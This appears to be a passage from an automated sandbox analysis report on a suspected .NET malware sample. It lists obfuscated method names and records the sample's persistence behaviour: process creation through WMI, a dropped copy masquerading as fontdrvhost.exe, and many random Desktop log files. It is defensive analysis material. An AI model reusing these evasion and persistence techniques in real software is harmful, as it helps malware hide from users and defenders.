Source: ZT3pxe2Tb4.exe, hMjBriK40KebJGhAYmQ.cs High entropy of concatenated method names: '_2JN', 'A67', '_49I', 'uqIKcvlyIf', 'asDKJVICv8', 'mgnKAlECkA', 'FVcKzY5Jy1', 'Ouua3esIlb', 'SQdaWwkggl', 'xQRFD3W5GREXLSZOIZ6H'
Source: ZT3pxe2Tb4.exe, aTgUygLFeVy5edD89Ae.cs High entropy of concatenated method names: 'aI6LHxY4MS', 'QnAL8OS6CH', 'pgALNxmOY8', 'q5KaheWotxOjj9xjTqw1', 'TgBq2sWom3T8IULBGgkn', 'v14HX7WonspJilOXqCCB', 'inmaqXWoffLJcyiit785', 'yRtXGqWoPOPGZlkA8AFC', 'f2ohwRWoEjLy0fxB4SlE'
Source: ZT3pxe2Tb4.exe, ViYhcOdF6vrUa0t1cjY.cs High entropy of concatenated method names: 'GYYdHYshg4', '_64r', '_69F', '_478', 'Ffyd84HaLF', '_4D8', 'fDwdNIPwuk', 'MkqdxX6T6O', '_4qr', 'WJNdsyoQFL'
Source: ZT3pxe2Tb4.exe, uasKPgqg0wV17QK4luA.cs High entropy of concatenated method names: 'UBCqdMCWW2', 'M2aqYYZ6kF', 'J1mOQ7Wa1BE7ogk8RAN9', 'KaIno1WaGixdQbC7UNhw', 's9RaCnWaSIi3NZRaqRRN', 'al0uMfWagZbQZ4LeRBcL', 'v43q9V2cac', 'smDqZdRSl1', 'kEaqyFTRnV', 'RNYqbbY9nT'
Source: ZT3pxe2Tb4.exe, kybOR8oTmeBISGwfmSh.cs High entropy of concatenated method names: 'egOoDux0Or', 'SccopGwdZW', 'krgouJCNhT', 'Cm01THWEN9et5W0EMbWS', 'wC0hbqWEHVd3MG51ZTiI', 'x3qIQCWE88FIX3jwhgiC', 'UIgT3lWExribZNZL2cZu', 'wMYIxPWEsLCEVmLE46Vd', 'g4w5jAWET2JcAXx1daDJ', 'm9TtXSWEkIfF8AtiWxXH'
Source: ZT3pxe2Tb4.exe, SJGuNI0uH1RArSK0LD5.cs High entropy of concatenated method names: 'tvQ0Gu2HDM', 'DWi0SXRPmw', 'wyP012niCO', 'Uht0gn3di7', 'iF80eS3wEP', 'W2H09d5swb', 'u7e0ZRanfA', 'mPU0yXQ65L', 'JS80b30dq4', 'nHi0owuppM'
Source: ZT3pxe2Tb4.exe, v2CkUEWyx02og5QaT9I.cs High entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'j9VWFkFfihW', 'cnqWi5B8Sbb', 'L2hfrCWb4fenqAadb8x1', 'UCnAJUWbC1Bo8UPyofw7', 'SQGhqNWbc7RbZEkl7vvp'
Source: ZT3pxe2Tb4.exe, uXVGqXqxAnF7qry6M3R.cs High entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'kAiWFSLpZnF', 'TeAWizk87oU', 'MFNEwLWa3ntbDuaRcE2Y', 'gXwdRcWaWheoaVrsZe1g', 'lUHqwEWaL5E5sxGhdPjY', 'gdvgxAWaicZx33EmW40w', 'kNBPQsWajjvO0aLRGnL4'
Source: ZT3pxe2Tb4.exe, pm0mP5pLfQBPCqdik4R.cs High entropy of concatenated method names: 'FQ3pp5nQcg', 'JdapBfSQPW', 'FubpjGYFc2', 'wcipqD7Wya', 'qJxpMulk9A', 'VKdp2WRmuj', 'FYtpFWhwIR', 'urgp6UbXDt', 'ys8pHvSYli', 'bhXp8VvwM7'
Source: ZT3pxe2Tb4.exe, Ww4k6dwNg7TTBpNPODA.cs High entropy of concatenated method names: 'rn3wsZGFM0', 'N9mwT9pv3C', 'n3Xwk2IoRG', 'sfNwD0JPDQ', 'hs2wpduBr0', 'BkRwugdc0A', 'xiZXRLWcnTXtoruJprus', 'D8eQYDWcfLKvl03m7ANI', 'T329SBWcPOgVomlQwrmw', 'FoXjP5WcE9mbaCdGJpUE'
Source: ZT3pxe2Tb4.exe, sTBjDmDgGaOZJNJPS2b.cs High entropy of concatenated method names: 'edgDPTjmqj', 'MPVD9MgGfm', 'ncLDZFjyLG', 'oN7DyxnOWq', 'J7oDb4U7Sm', 'LW1DoYsLM9', 'fKODhZ4DYK', 'Ul2DO4Nq5r', 'wNtDKymRYi', 'HsPDaeJYaG'
Source: ZT3pxe2Tb4.exe, uQGZYWjdDiVt8p1pGAa.cs High entropy of concatenated method names: 'ERVj0SWeTX', 'X2qjXgg0QE', 'JvR5yJWKg1iARcH3A6Ok', 'OyVFe7WKSQZGAqEsjwBV', 'u4Cme1WK1OTKjoBu1wok', 'L0MwxTWKefNQ8cQTdOjU', 'wNADDjWK9WXmdwGPOIqD', 'HHkTJZWKZgxc037kfk8O', 'yYnMi3WKyYKXS0pTAegA', 'DPaMqUWKbMUChsJRBoR1'
Source: ZT3pxe2Tb4.exe, nVmYajLBrhsY5QJ9CXJ.cs High entropy of concatenated method names: 'LvGLSQQX6U', 'PaKL1toIbU', 'uI3KwWWoJfqEmLrqwnNu', 'QRBxs3WoCDysBq72VsCv', 'YGlJx7Wocj7QJPhkscSD', 'vGU7BoWoAZTwO1rPen71', 'vMC1fmWozA5i3uPAJHBu', 'GG1oj9Wh3KeAAwS7K1Qm', 'Sm0qSxWhWJggHTTVLHoF'
Source: ZT3pxe2Tb4.exe, fkdgKLhSo1ryjWHpoDM.cs High entropy of concatenated method names: 'wXphg9r4nS', 'yUQhel6MWT', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'nL7h9gV0SW', '_96S', '_9s5'
Source: ZT3pxe2Tb4.exe, K4L4Kuoi6p2AyuhfbCC.cs High entropy of concatenated method names: 'IWIoqF6bIA', 'G0GoMwB9FM', 'dpUo2GDsea', 'F3UoFLVeme', 'N14o6INJip', 'jAJGRjWPJC25ePw60pFF', 'nHvNjxWPCLp0jfSkeXpu', 'fSlpmNWPc9F03yBkXBNA', 'mMDalmWPAnZgwf7bfl73', 'yYBqwhWPziNyJgCZGJOM'
Source: ZT3pxe2Tb4.exe, c3y73XWUiip6Ld5dLTo.cs High entropy of concatenated method names: '_413', 'V29', '_351', '_2Q4', 'H7R', 'lkUWFuNFdy3', 'cnqWi5B8Sbb', 'M19VD1WoSDuJrpgrj8qP', 'pja14cWo1QES1tkPJU7l', 'uDt9xnWogRh1wEaAPU4v'
Source: ZT3pxe2Tb4.exe, MtpvWFxndmfaRZi5UFW.cs High entropy of concatenated method names: 'b7jxPEdlOl', 'QWPxExhebG', 'EeQxU586pA', 'YSZxvRENuU', 'W5Jx5YeqQm', 'UHYPo9WV3uT83YTQ9JAV', 'v6D7Y2WVWeAW47Ya9oLM', 'mHFnTeWVL773K60AOhR0', 'GZxHypWViOru2W9U05if', 'HcQXS7WVjtF69T8V3Hek'
Source: ZT3pxe2Tb4.exe, zuitJ08Miu7x1I3wlys.cs High entropy of concatenated method names: 'X1eAnbWXBxMBKwPjYEGy', 'VrmBZRWXpYmseugRB2wB', 'hQTrWRWXuI6GnFoqcbBB', '_7kT', '_376', 'e298FM2M51', 'eM986RRr48', '_4p5', 'oOe8HFvTFp', 'UFs88NnOw9'
Source: ZT3pxe2Tb4.exe, EUZnvjhVDkfEOpF8qtm.cs High entropy of concatenated method names: 'Bv3htjMnJu', 'KM3hm8NZQL', 'SkNhnte9pv', 'twIhfqM1bP', 'PK8hPsMiAN', 'aNNhECfeAe', '_4tg', 'wk8', '_59a', '_914'
Source: ZT3pxe2Tb4.exe, CudGtbJnUdMqyGkOyGM.cs High entropy of concatenated method names: 'fIaWMU1mAAW', 'BSNWMv8UYy3', 'JV4WM5mwkCu', 'D8bWMIoHwnx', 'sxYWMQbD7Ot', 'os0WMRw0g3P', 'TQ0WMwcSvjY', 'ExdA6bgZHi', 'mvMWM4k2kei', 'E7qWMCmTBqQ'
Source: ZT3pxe2Tb4.exe, aL44LIoQoNd9326E6sO.cs High entropy of concatenated method names: 'P2qowNiiSZ', 'Rlko4pRphs', 'vMIoCBKRXB', 'Xe9oc4EfrY', 'rASoJY2fkd', 'yl8oAiVTF3', 'cQdozCBLd9', 'ApPh39cIEt', 'BxMhW8dWmv', 'LWJhLASQo4'
Source: ZT3pxe2Tb4.exe, BQrhPBRjIY94a9BGjPW.cs High entropy of concatenated method names: 'HP3RMVm9lv', 'YgHR2fhOSt', 'iBnRFAMuLb', 'mQCR6uPpHT', 'oJLRH2wO9D', 'VF4R8GMCij', 'sjyRN9GTr1', 'YLSRx4SAli', 'UueRsUgfUY', 'kknRTPiHVa'
Source: ZT3pxe2Tb4.exe, UxmYitTB4aVlnUcMt7B.cs High entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'tfyTSFUAGk', '_947', 'QCKT169MAK', 'ypVTga4gGX', '_1f8', '_71D'
Source: ZT3pxe2Tb4.exe, xGXCVXRnqsrcf8MjaPh.cs High entropy of concatenated method names: 'FO7RPWXO44', 'wXoRECg4CQ', 'iq1RUFSKyh', 'eArRviKlQa', 'G8BR5YQpHy', 'TWrRI71uvB', 'xoyRQVJ0Si', 'ki3RR3hIDT', 'IhL1A7WculSAWP8LKocM', 'mJkaSsWcDTkeYb1ioiOj'
Source: ZT3pxe2Tb4.exe, rqW7SwQjVj5lFN7Wtgl.cs High entropy of concatenated method names: 'dcyQMJkeaa', 'tOeQ2Q2uwf', 'tfwQFrnTLy', 'qTfQ640qDw', '_0023Nn', 'Dispose', 'neen1HW4Q7eYdTJHolUk', 'xWV58CW451iad724ZUk0', 'IYDraoW4IasLwLkLEJd3', 'k5X6LcW4RJQ4X8b9E41c'
Source: ZT3pxe2Tb4.exe, gpZraAqE8t6bNqW3rKd.cs High entropy of concatenated method names: 'P4RqciSxn6', 'l7FqJch5m4', 'olxH4hWa7mkiPXmG2Mu0', 'pR3KIyWaaQH9GXHf0CEE', 'sLZ6ulWalVIWCdwDY13q', 'R0fMWkF2v7', 'pUv33DWaXvxshWMWWEfg', 'OM5EMDWaVuo9ThEZe0od', 'djHGUUWaYUAqxBssoDSM', 'wNbYQVWa0w4bZfGaJ4N8'
Source: ZT3pxe2Tb4.exe, AWst4S0tAZLyykQy96r.cs High entropy of concatenated method names: 'RPq0n2PjrA', 'aQs0fwrOdy', 'PyK0PIBaMx', 'iQZ0EgYKas', 'kIV0U5qXhZ', 'HgR0vAZei3', 'Kvk052gSC8', 'fu30I6hfs8', 'YwX0QW3lRg', 'cQ10RGX0po'
Source: ZT3pxe2Tb4.exe, BUP4lgHfnBc46OMHy7l.cs High entropy of concatenated method names: '_34V', 'y7u', 'j1FWFXoeQm0', 'Mf4HEuBiOs', 'gt1', 'mlV8KAW07iHJ2oL9Rw42', 'cIWCdFW0aoINaN278L3a', 'TMEb5HW0l4SlX0bpidGv', 'OMTYv1W0dQ2XlXAVf5s2', 'hNp0pyW0Y64F6Q84Bwkw'
Source: ZT3pxe2Tb4.exe, N8RSOlLO9Gp83pgPicl.cs High entropy of concatenated method names: 'EkALr3hiE2', 'eqDBhjWhs9DdI53SPxdm', 'FodORAWhNPLCW5AYpLxS', 'E4RJyvWhxysJYp0N97uo', 'nJIQWSWhTrpIG2Ew7w0a', 'LS4NfbWhkHKgU3WXZNBE', 'TKiLa66oEO', 'xsqLlyPY8p', 'rWOL7C6dr0', 'Xo5LdZoG37'
Source: ZT3pxe2Tb4.exe, NXd2dm6nao4utQP3xcT.cs High entropy of concatenated method names: 'IDV', 'd65', 'y8xWFoSgNvU', 'HyrWj32dYif', 'QZ46PxKksQ', 'IMD5bRWYTFvlGpXSnOsx', 'zLsl3qWYkdBlcVpbsN8y', 'Kjl4aLWYDVR0bC9VwHUp', 'GQVrWJWYpMCkHsiPpbCB', 'nv45wtWYuyAlvUCi09hP'
Source: ZT3pxe2Tb4.exe, DBGeHyiDRG5ErPLiQ6i.cs High entropy of concatenated method names: 'EoaioEV72M', 'lNWihCo1Z6', 'JJaiOKomkx', 'mySDNIWOFXUhnjZWuUji', 'VJssn2WOMketcQMImPrg', 'hpWxK7WO2cxNhTtCfV4Y', 'hkoi9CZE33', 'kuXiZQKEj7', 'APhP4kWOj8S96SPPAf9t', 'y7PtKJWOLQWYq4PAtqhC'
Source: ZT3pxe2Tb4.exe, M6SPGhQxLc1aSIS1yXU.cs High entropy of concatenated method names: 'iOnWM0BC61s', 'plpWMXQYwLO', 'lPyWMVd2Aic', 'itEPLvWCyjBuu2MCGtLq', 'zTH20aWCbv2fd4jWnPAM', 'TyBwNeWCoxtMeV6Ry6yt', 'N71WFEG4ufV', 'plpWMXQYwLO', 'eoJ1gAWCaWdI7y3uxm5W', 'nZMD1DWCOB5iJkCNTTff'
Source: ZT3pxe2Tb4.exe, ryu8bxoG9xsMFGvwTbA.cs High entropy of concatenated method names: 'HVNo1y2WyW', 'rsKognoaEK', 'ov8oehuEMy', 'Se7o9AV7hn', 'pMhoZFc2Kd', 'r1eoyubN37', 'P2cPI0WEBOipBLFZQYRo', 'Qy8WQ7WEpOfASBkVVI4Q', 'DRiRAAWEuHVsTqUbtId2', 'ioHVOEWEGEX05cROaYlY'
Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.cs High entropy of concatenated method names: 'wYvC2oWJSQjM8vNAifol', 'SdyQ3DWJ1WqTCyxdwST5', 'GAtcco2xLB', 'iwb7QEWJZ9y47E5JDSdJ', 'Sdtwb0WJyqNiBg0vHhB8', 'S2pYfHWJbk4TmI3MwGrT', 'qrm6iwWJowNa6qDPrMVn', 'hi8CJyWJhltpoZrEOFu0', 'zmwpuEWJOPcQuiITomjM', 'a6fVVHWJKGUiogPjcy14'
Source: ZT3pxe2Tb4.exe, H95vgtMfmgjo8uRkCOU.cs High entropy of concatenated method names: 'rqR23wC7es', 'GU62WrjbJE', 'PWA2LyMsUn', 'ImJ55hWlnpe9OeCUZlCl', 'scBP3fWlfC7NLDCCPi9L', 'OSDL9EWlt2VAcTKbuyf4', 'qZwoD8Wlmywgq8FH81mR', 'gRuMEtPn3m', 'LO2MUgTJB5', 'M8cMvT801X'
Source: ZT3pxe2Tb4.exe, hkf8C7M207boKQQHk30.cs High entropy of concatenated method names: 'F9rMGCUPFm', 'T8MMSkHvSp', 'FWqjjpWl3Kdnm8xC13hB', 'TEDJbiWaAqLBX1ofYce8', 'BBVpAGWazHIKMqspRQ5t', 'O2gIv2WlWcwma4ZTm9qr', 'b2XMp3AsxN', 'uB0MuRFCHc', 'RtdQW0WaChlscADO9MVe', 'ji0nINWawERVw8t8cgHY'
Source: ZT3pxe2Tb4.exe, Cjj50nXGLj0ZTJOPI3k.cs High entropy of concatenated method names: 'xqk72kWRd7lpvVj2i4gd', 'g8YFkYWRYpxcC3lkAPyK', 'GmAbPLWRlWAn3WDEVsUe', 'lgKJVXWR7tpcDfp9HiHA', 'xrtnDuWROL1SeRo3DgXi', 'i9uMy5WRKNfhNUCSuebp', 'rEAAbvWRoRuYrnbbhjQE', 'iPOn9vWRhcYoSE9ZstI5'
Source: ZT3pxe2Tb4.exe, odu5MJzCeylv0KMbdI.cs High entropy of concatenated method names: 'TXmWWKUc0n', 'HjdWiojb1p', 'RAjWjQ6d1u', 'dydWqLosMI', 'Mg4WMv1Gjt', 'eChW2fd5WP', 'EQnW6fbSyQ', 'ObLsLoWboEG2PJZsAZQ6', 'hqvuGcWbhSY25VXY3sFl', 'caXqQLWbODBWG941kOvI'
Source: ZT3pxe2Tb4.exe, bBbFAXpRHjfbKj4fxXX.cs High entropy of concatenated method names: 'Qt7Rv2Wnr9IAj9i0cKws', 'yUvPCIWnt1ehFJoq4WDx', 'dXbFFjWnmr3t8cvrTBk7', 'EIGgZT8XV5', 'OrUwo3WnEmlnw3VR7Y5Z', 'FwNpI2WnflmgpVPN3Ayn', 'cTHJHDWnP4LvhmMJS2pO', 'hMIgHqWnUqrnaHnXV9qV', 'eCsHC8WnvS6NKDoIemUX', 'eeQgoeB8OC'
Source: ZT3pxe2Tb4.exe, OpKD0lidMg583mZg3xK.cs High entropy of concatenated method names: 'dUqi0YJoDy', 'HnpiXigub6', 'Gh2iVAmGd8', 'xIjirKi6Sf', 'duGitkPl9c', 'y7IimqIRpp', 'fb1inTdwuH', 'NsRifKqb1C', 'fPGiPqXkby', 'bVmiEaL05S'
Source: ZT3pxe2Tb4.exe, XEkmGGCp8qxEBME3Y23.cs High entropy of concatenated method names: 'YGWLqUeNIwY', 'Sx5OMjWJsrks2TqkiKRa', 'Did4nkWJTAUTHwCpEBPq', 'QmL8X3WJkt9bKx1PpLXR', 'dHtYd7WJDHySugbch8nw'
Source: ZT3pxe2Tb4.exe, dJShQx7UFqhUNotsxMD.cs High entropy of concatenated method names: '_25r', 'h65', 'SwC75nrve4', 'srn7IVMVqR', 'BBW7Qomx7j', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
Source: ZT3pxe2Tb4.exe, kAsrVt28NY4q1okyEwG.cs High entropy of concatenated method names: 'BIr2xcNqFZ', 'dk82sIm0vW', 'jpG2TbnqSO', 'e4FEaGWlRSHBGri3hIv1', 'zhfxs2WlwgoRVj83AnVi', 'p0eHciWl4L0IhqtEJEys', 'Yv8hBIWlCXtvruduVsxU', 'xdJkVRWlcpwLLnAKFvdp'
Source: ZT3pxe2Tb4.exe, C1w6GQH6uuREBUG2hXr.cs High entropy of concatenated method names: 'J3ZHskveia', 'pBQjJFWYQPh1t9JgkYgA', 'WBk1saWY5WhkZ4FSZ6oU', 'B3mNHUWYIZCv7oRpASqq', 'I51kjUWYRupDdkECTZbm', 'CEI2s8WYwQgR9yiL3xrf', '_53Y', 'd65', 'I5aWjePS6oO', 'HltWj9uwY8t'
Source: ZT3pxe2Tb4.exe, T2T5iSIKET210oxdcXb.cs High entropy of concatenated method names: 'k9fI7EETs2', 'mUaIXrVYrE', 'KP8ItxKMhF', 'M3eImN3guN', 'WAAInL1qAQ', 'fCJIfFiAaq', 'g03IPdB6v5', 'vwJIEgqTcu', '_0023Nn', 'Dispose'
Source: ZT3pxe2Tb4.exe, R6vBZyKah4J5acQK53O.cs High entropy of concatenated method names: 'ctuK7c171V', 'vqcKdo0H8Z', 'zFrKYBWXK0', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'yeQK0jtSFx'
Source: ZT3pxe2Tb4.exe, An43bwHCmwL8IFbu9GJ.cs High entropy of concatenated method names: 'My5', 'V4X', 'zT6', 'zxZHJ9e98l', 'FekWFtoTRR2', 'PZZHAgylGS', 'thxWFmfY0fs', 'uvkP6qW05LhwIa7chWKm', 'hmoUOUW0UCadcAZZYGW0', 'VBE0PZW0vqX3eM0CrIZ6'
Source: ZT3pxe2Tb4.exe, v8QDIMOi2wN3bwmtmQC.cs High entropy of concatenated method names: 'QxiOqqJqfM', 'kQTOMtJXvW', '_7Bm', 'GtNO2VYuuP', 'qhyOFIOw0C', 'hEJO62a5O8', 'jVGOH3SCPl', 'upMaEeWUVAcZpI7fuQjC', 'TZuPWEWU0Dnllct0adbC', 'PZ39WkWUXWl89KkoFbE6'
Source: ZT3pxe2Tb4.exe, xIqDoaaMLvj33sZyqpu.cs High entropy of concatenated method names: 'yBePW9W5XYZfgpUN59Q0', 'oxyK5hW5Y3CmiJNJhIrW', 'mgLPniW50b0dafQQ6lL0', 'nhdaFKcjqp', '_1R8', '_3eK', 'Kc2a6yELxd', 'jgnaHTkwRb', 'ItMa8MQI9M', 'tduaNrAr6x'
Source: ZT3pxe2Tb4.exe, q2rE5WIZ0VEXSXWmW5a.cs High entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'lArIb693gl', 'zETGaFW49vxvbPE9JdSq', 'pIDnegW4ZLkdImMww6xn', 'taZb3GW4yY2n29sIJae5', 'dPfXJlW4blxD65yVTLIl', 'b9Ku0eW4oSParpFmtR3y', 'FQXIvnW4hVnRaS6xYDhn'
Source: ZT3pxe2Tb4.exe, sfYYHd5IKSRE4RMxBy5.cs High entropy of concatenated method names: 'C14WFPRAuQI', 'bg05RCylOu', 'UBF5wMH0Pf', 'Q3I54mBT2m', 'cZiDTqWwKD96H0gkCru9', 'PWXjVyWwa65XnaOAnQOw', 'MxP98XWwl6V88oeAT2UT', 'pBoGp9Ww7ykW5exjScRs', 'vM46H1WwdWdZ0oDUxhqZ', 'T0dVH5WwY8msljDW8Sga'
Source: ZT3pxe2Tb4.exe, JrurtS2lj31Cs6BodjK.cs High entropy of concatenated method names: 'hKE2EOXnKJ', 'RSo2Un4Sal', 'oKA2vHxfL8', 'tnVhedW7Zo5BwmvGlB9i', 'avS6A3W7e5tQS5YoTCe1', 'g6J7weW79cByhyjgAtxN', 'fni2dY11RH', 'lGO2YclNWZ', 'NNv20fkohU', 'xnX2XSZJ00'
Source: ZT3pxe2Tb4.exe, IKFMi52wZfruKtYB7OI.cs High entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'tF5d9XW7ldicFEOFWUsw', 'G1atOjW77ZvODKACGfN7', 'n6eXljW7dOU7bqG3gBZN', 'jbD2CNqj0a'
Source: ZT3pxe2Tb4.exe, zRgPCq6woxI16aoWYBS.cs High entropy of concatenated method names: '_46E', 'd65', 'lXL6CE8ZCq', 'k1vWFOTw9qC', 'HyrWj32dYif', 'PhF6cMw4d3', 'E6ATqlWYbAKSNYqhYd3o', 'EgCAbDWYoQNVWF1VFLUe', 'PgWwWKWYZuk51jyofvEW', 'IQi8PWWYyNCKQ65Bjwy8'
Source: ZT3pxe2Tb4.exe, QcZOAO6vk8rAj7gtvNM.cs High entropy of concatenated method names: '_8X5', 'd65', 'WSXWjpM8MYd', 'rG7WjuoDpE8', 'hwHWFhIXyCn', 'HyrWj32dYif', 'sEEjUIWY1LK45Tyk1509', 'SxplQFWYGFePOONVuhoJ', 'sMSZrMWYSDKRfQkp4gwZ', 'JP1HyGWYg2Ylpi5jadoX'
Source: ZT3pxe2Tb4.exe, lLDVmHLWjUhCgYrl3Rg.cs High entropy of concatenated method names: '_5E9', 'V29', 'e6S', '_2Q4', 'CVq', 'HhNWFG8bXcH', 'cnqWi5B8Sbb', 'X8AQLdWolZGJxE38xfCR', 'Y7Sd6lWo722K81KQJ3FY', 'TCt6L4WodsXcKPX2ZL6w'
Source: ZT3pxe2Tb4.exe, V8766ojZZ4pu3HNSGos.cs High entropy of concatenated method names: 'arCjbqDUrl', 'bU3jomaRAl', 'fxejh6Pdhr', 'T7GjOXB093', 'lgdb66WKsWBGWtTbOSLg', 'zgUv20WKTs7gtxMXsqGp', 'wN05nXWKkTuVfTyOMk32', 'NOLUt4WKD2vR98fuVTVr', 'ryJ3C6WKpOS3bm1ZbBMx', 'ew0LLVWKuBM2g2r0q5Y0'
Source: ZT3pxe2Tb4.exe, WVZ0XYgYvlJtODagQ4F.cs High entropy of concatenated method names: 'ahobZ0h2pM', 'n71byrebkH', 'MTWkW5WPKDbrUbfHH11G', 'r7Cs7SWPhPaojModqhZn', 'OBa3sgWPOefmy3Y7tWD7', 'Gk309gWPattNTrjvlY2w', 'T1rEcAWPlAtWwwg6dj46', 'WPBbavVqcE', 'HHiIiIWP0OwIOiilHw3g', 'pU4vH4WPdRnGTtrF1Viv'
Source: ZT3pxe2Tb4.exe, GYCJ4CFUhCyW29mDrt9.cs High entropy of concatenated method names: 'pyKFwXLJtt', 'm4eF4gHWm3', 'SQhFCmN6qa', 'JM4FcXkOwE', 'cmeFJSEqwv', 'O2eFATvm8h', 'zW6FzaBrNf', 'Jwu2q1WdZWckrAEECoy7', 'cUp2nUWdyO0LpGWuhhw5', 'dv4QX0WdeE5UyisZg8xV'
Source: ZT3pxe2Tb4.exe, IpLxPxiJdq7xL6uVcaa.cs High entropy of concatenated method names: 'ahWjTuYles', 'rEkPJnWKWqQ9i3GBmu5C', 'Pc1X37WOz09bHfLGhpPC', 'qTJKICWK3Wy4tyITLdPj', 'pRNLW4WKqOVqJjVhvi9s', 'h58omOWKiPhADiSt5yW6', 'gZpMuQWKjkfbwlRe1pwW', 'MiAk6QWKMaI9bmcWvWeP', 'toujg5o3n4', 'rR1kOeWKFE608C3DKwrs'
Source: ZT3pxe2Tb4.exe, hMT9ywHlIqlcYuym49Q.cs High entropy of concatenated method names: 'Yi3', 'zMtWF7R1TaH', 'RLJHd2wyg9', 'mRsWFdCKttI', 'GGqUqJW0uIaM5SGOMZRL', 'NZIZbQW0Bp8snB9vxcS9', 'gLQnlPW0DTrsZoPoqhfm', 'vWWgG2W0pktMsZrUDE9s', 'QoYXryW0GY9vbhW580db', 'k8u5veW0S33SNv9uhQ8U'
Source: ZT3pxe2Tb4.exe, oYwZnTJ15040JqFbW6V.cs High entropy of concatenated method names: 'N1aJlXhMBd', 'rRwJ7vQZj8', 'yr7JdB9frj', 'mb7JY6hFXI', 'WRhJ0vPybJ', 'FtEJX7oEE6', 'GX4JVOiVXt', 'JJ8JrGN4dp', 'lNJJtSsDGp', 'OB8Jmb4KMh'
Source: ZT3pxe2Tb4.exe, a3TVa9pePG9oxZpcv7.cs High entropy of concatenated method names: 'L2x7TpOb1', 'xRbFGtWyw7LZDM6uhCl0', 'TCyhTVWyQPyXwgXJmVlE', 'JZ2x2iWyROMTIGDHNsRK', 'v0WBgUSfr', 'HYRGaqCYV', 'BPvSfs5rf', 'Wku1NZ6GR', 'UVkgJAyeq', 'eEieZ8pBs'
Source: ZT3pxe2Tb4.exe, m9y5wALnB8SHFKsKEAV.cs High entropy of concatenated method names: 'zbSLJgGDnv', 'pvFLAKXC3u', 'kpoLzxUEwQ', 'sF2nYfWh70XvZxUVL3LY', 'ugO4ESWhaH24Xk31gykB', 'ACFtYpWhl3HKL3M6ner0', 'XL5iq82DK7', 'QdDyGuWhXSFNpWWw30Be', 'QD3K41WhY9jqBgA0Ia1X', 'pu2RGGWh0JW2wxAbrAbM'

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\IsWIxvZJ.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\auteTnDC.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fzXEwQRC.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zTojkKNX.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\AaPSReOe.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uztLDTCs.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\hezDLgou.log
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\tIxJOpqh.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CkrRJHNx.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\bYjfzcZg.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\xOrrZDRn.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\yEAAOeyR.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WvXEaKPX.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ntFcgnCN.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\feqUKmVF.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\bAJNFhyM.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WAZwZzli.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\BxnIYuRz.log
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\AppData\Local\fontdrvhost.exe
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\EQFIYaOX.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fLnmpTPV.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RMfXVWDe.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\EOpBrqDR.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\nJodFojJ.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\UbSwNisy.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aYVnMXzh.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RnzHiPIs.log
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\RMCoLrQk.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uRiBlhjd.log
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\PCgnLZlk.log
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\qxbJOXLg.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CGTrJaEm.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YMjefUJa.log
